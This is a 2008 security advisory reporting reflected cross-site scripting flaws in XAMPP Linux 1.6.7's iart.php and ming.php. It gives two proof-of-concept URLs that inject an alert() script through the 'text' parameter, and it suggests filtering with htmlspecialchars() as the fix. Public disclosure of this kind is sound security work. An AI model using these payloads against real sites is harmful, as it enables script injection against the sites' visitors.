Security Advisory: Xampp Linux 1.6.7 Multiple Cross Site Scripting Vulnerabilities

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  CA Products That Embed Ingres Multiple Vulnerabilities
  MyClan Sql Injection
  PHP-NUKE module Kleinanzeigen SQL injection (lid)
  Pluck 4.5.2 Multiple Cross Site Scripting Vulnerabilities

From: irancrash_(at)_gmail.com <irancrash_(at)_gmail.com>
Date: 07.08.2008
Subject: Xampp Linux 1.6.7 Multiple Cross Site Scripting Vulnerabilities

----------------------------------------------------------------

Program : Xampp Linux 1.6.7

Type : Multiple Cross Site Scripting Vulnerabilities

Alert : Medium

----------------------------------------------------------------

Download From : http://puzzle.dl.sourceforge.net/sourceforge/xampp/xampp-linux-1.6.7.tar.gz

----------------------------------------------------------------

Discovered by : Khashayar Fereidani Or Dr.Crash

My Website : HTTP://FEREIDANI.IR

Team Website : Http://IRCRASH.COM

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com

----------------------------------------------------------------

Cross Site Scripting Vulnerabilities :

Vulnerability work when register_globals set as on .

http://Example.com/xampp/iart.php?text=">><<>>"''
<script>alert(document.alert)</script>

http://Example.com/xampp/ming.php?text=">><<>>"''
<script>alert(document.alert)</script>

Solution : Remove xampp folder or filter text variable with htmlspecialchars() function ....

----------------------------------------------------------------

                       Tnx : God

                    HTTP://IRCRASH.COM

----------------------------------------------------------------